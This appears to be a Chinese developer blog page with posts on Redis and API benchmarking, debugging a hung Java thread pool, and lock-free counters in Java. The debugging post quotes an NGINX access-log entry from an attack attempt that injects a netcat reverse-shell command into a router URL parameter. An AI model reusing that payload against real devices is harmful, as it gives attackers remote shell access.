Ligh0x74's Blog

2025-03-21发表2025-03-21更新语言 / Java1 分钟读完 (大约179个字)

服务器硬件配置是 2 核 2 GB 内存，对 Redis Get 命令进行基准测试的 RPS 是 7w+，而应用程序接口会将数据缓存到 Redis，即使每次都命中缓存 RPS 却只有 1k+。

$ lscpu
Architecture:        x86_64
CPU(s):              2
CPU MHz:             2499.998

$ free -h
              total        used        free      shared  buff/cache   available
Mem:          1.8Gi       1.3Gi       140Mi       1.0Mi       551Mi       545Mi
Swap:            0B          0B          0B

$ redis-benchmark -t get -c 50 -n 100000 -d 8 -P 1
====== GET ======                                     
  100000 requests completed in 1.41 seconds           
  50 parallel clients                                 
  8 bytes payload                                     
  keep alive: 1                                       
  host configuration "save": 3600 1 300 100 60 10000  
  host configuration "appendonly": no                  
  multi-thread: no

Summary:                                              
  throughput summary: 70972.32 requests per second    
  latency summary (msec):                             
          avg       min       p50       p95       p99       max
        0.478     0.144     0.407     0.863     1.183    10.327

$ wrk -t4 -c100 -d30s --latency http://127.0.0.1:8080/predict/biweekly-contest-152/1/25
Running 30s test @ http://127.0.0.1:8080/predict/biweekly-contest-152/1/25
  4 threads and 100 connections
  Thread Stats   Avg      Stdev     Max   +/- Stdev
    Latency    75.57ms   32.14ms 490.57ms   85.10%
    Req/Sec   337.43     69.15   530.00     76.79%
  Latency Distribution
     50%   71.32ms
     75%   85.89ms
     90%  103.88ms
     99%  201.92ms
  40414 requests in 30.11s, 269.38MB read
Requests/sec:   1342.26
Transfer/sec:      8.95MB

2025-03-15发表2025-03-21更新语言 / Java2 分钟读完 (大约363个字)

线程阻塞在 at sun.nio.ch.SocketDispatcher.read0

问题排查

定时任务一直没有完成，使用 jps 和 jstack -l [PID] 查看线程状态，使用 jstack.review 分析转储文件。发现线程池的线程阻塞在本地方法中，然后查看 Hutool 的文档，发现默认配置下 HTTP 请求是不会超时的，设置超时时间应该可以解决这个问题。（参考 How to Analyze Java Thread Dumps）

1
2
3

"pool-41-thread-2" #226773 prio=5 os_prio=0 cpu=6566.92ms elapsed=506952.44s tid=0x00007f66ec022640 nid=0x6188f runnable  [0x00007f66f98ea000]
   java.lang.Thread.State: RUNNABLE
	at sun.nio.ch.SocketDispatcher.read0(java.base@17.0.12/Native Method)

另外，使用 top -H -p [PID] 命令，可以查看指定进程的线程状态，发现都是 S 状态。使用 netstat -antp 可以查看 TCP 连接状态。顺便看下 NGINX 日志，发现有不少奇怪的请求，应该是攻击请求，不过没什么影响。

1
2

196.251.69.180 - - [15/Mar/2025:10:00:32 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28rm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+196.251.69.180+61781+%3E%2Ftmp%2Ff%
29 HTTP/1.1" 200 760 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36" "-"

常用命令

uname -m, whoami, pwd, jobs, ctrl-z + [bg | fg]
wget, scp, tar -xvf [file], curl -X POST [url]
systemctl [start | stop | restart | status] xxx
nohup java -jar xxx.jar > /dev/null 2>&1 &
ps -aux | grep xxx, kill [pid]
top -H -p [pid], netstat -antp
jps, jstack -l [pid], jmap -dump:format=b,file=heap.hprof [pid]
jmeter -n -t "xxx.jmx", jmeter -g result.jtl -o result

2025-02-08发表2025-02-08更新语言 / Java9 分钟读完 (大约1376个字)

Lockfree Algorithms

参考 Lockfree Algorithms，Is Parallel Programming Hard, And, If So, What Can You Do About It?（中文版名称《深入理解并行编程》）。

最近在看《实战 Java 高并发程序设计》，遇到一些问题，所以简单记录一下。上面两个参考资料都非常不错，由于时间有限，并没有全部看完，有些地方也不能完全看懂。第二个参考资料偏 C++，如果要看 Java 相关的书，或许可以看看《The Art of Multiprocessor Programming》。

阻塞算法（Blocking Algorithms）：被阻塞/中断/终止的线程可能会无限期的阻止整个系统向前推进。使用锁的算法都是阻塞算法，因为当持有锁的线程被阻塞/中断/终止时，其他线程无法向前推进。以及存在死锁问题。

非阻塞算法：被阻塞/中断/终止的线程不会阻止当前线程向前推进，包括无障碍（Obstruction-freedom）、无锁（Lock-freedom）和无等待（Wait-freedom）。无障碍：线程只有在没有遇到其他线程竞争时，才能向前推进，也就是说存在活锁。无锁：必然有一个线程可以向前推进。无等待：所有线程都可以向前推进。

概念比较抽象，可以想下经典的例子，对于无锁来说典型的就是 CAS + 循环。那么为什么说这样是无锁的？对于多个并行执行的线程，必然会有一个线程 CAS 成功（当然其他线程都会 CAS 失败，并且会存在饥饿现象，即某个线程可能会一直自旋），所以说这样是无锁的。

常见的误区是认为，无锁算法一定比基于互斥锁的算法更快。实际上，以上术语只是关于系统向前推进的保证，和性能无关。参考资料中有一句话，我不太理解，但还是先放这里：

So blocking is at least as fast as lockfree, while it can be faster (when it happened so that the fastest known algorithm is at least partially blocking).

这也是《实战 Java 高并发程序设计》中犯的错误，书中提到以下代码使用 AtomicInteger 比锁有更好的性能。给出的例子是，使用单个 AtomicInteger 变量作为多个线程共享的计数器。简单的代码如下：

public class AtomicIntegerDemo {
    private static final AtomicInteger i = new AtomicInteger();

    public static class AddThread implements Runnable {
        public void run() {
            for (int k = 0; k < 10000000; k++) {
                i.incrementAndGet();
            }
        }
    }

    public static void main(String[] args) throws InterruptedException {
        Thread[] ts = new Thread[10];
        for (int k = 0; k < 10; k++) {
            ts[k] = new Thread(new AddThread());
        }
        long s = System.nanoTime();
        for (int k = 0; k < 10; k++) {
            ts[k].start();
        }
        for (int k = 0; k < 10; k++) {
            ts[k].join();
        }
        long e = System.nanoTime();
        System.out.println((e - s) / 1000000.);
    }
}

在我的机器上测试，以上程序执行时间在 1900 ms 左右。如果使用锁呢？以下程序执行时间只有十几毫秒，性能相差 100 倍。为什么无锁反而更慢呢？因为使用 AtomicInteger 会在循环中多次执行 CAS 操作，而使用锁只会执行很少的加锁/解锁操作。并且，CAS 竞争单个变量，在多处理器的情况下，会频繁地使缓存失效（由于缓存一致性），所以在多处理器上执行反而会更慢，毫无扩展性。

public class AtomicIntegerDemo {
    private static int i = 0;

    public static class AddThread implements Runnable {
        public void run() {
            synchronized (AtomicIntegerDemo.class) {
                for (int k = 0; k < 10000000; k++) {
                    i++;
                }
            }
        }
    }

    public static void main(String[] args) throws InterruptedException {
        Thread[] ts = new Thread[10];
        for (int k = 0; k < 10; k++) {
            ts[k] = new Thread(new AddThread());
        }
        long s = System.nanoTime();
        for (int k = 0; k < 10; k++) {
            ts[k].start();
        }
        for (int k = 0; k < 10; k++) {
            ts[k].join();
        }
        long e = System.nanoTime();
        System.out.println((e - s) / 1000000.);
    }
}

我们使用 start /affinity 1 java geym.conc.ch4.atomic.AtomicIntegerDemo 命令设置程序的 CPU 亲和性，测试 AtomicInteger 代码在单核上的耗时，得到大约 500 ms 的输出，毕竟使用的是同一个 CPU 缓存，性能更高在意料之中。那么，如果设置使用锁的代码亲和单个 CPU，得到的结果依然是十几毫秒，毕竟加锁就是严格串行的，无法利用多核 CPU 的资源，即使在单核上执行也不会影响多少性能。

那么，如果要使用无锁算法，更好的做法是什么？使用 LongAdder，时间大概在 200 多毫秒，因为该类会将累加操作拆分到多个变量中，然后合并得到累加结果，所以比 AtomicInteger 更快。将单个变量拆分为数组时，需要注意伪共享（False sharing）问题，数组元素类型在源代码中声明为如下形式：

1	@jdk.internal.vm.annotation.Contended static final class Cell

使用 @Contended 注解，JVM 会在字段周围进行填充，从而使数组元素位于不同的缓存行中。可以看看这篇文章，对使用/不使用 @Contended 的程序做了基准测试，并且使用 Linux 的 perf 命令进行性能监控，查看两者缓存命中次数的差别，还是非常不错的。

问题排查

常用命令

链接

分类

最新文章

归档

标签

链接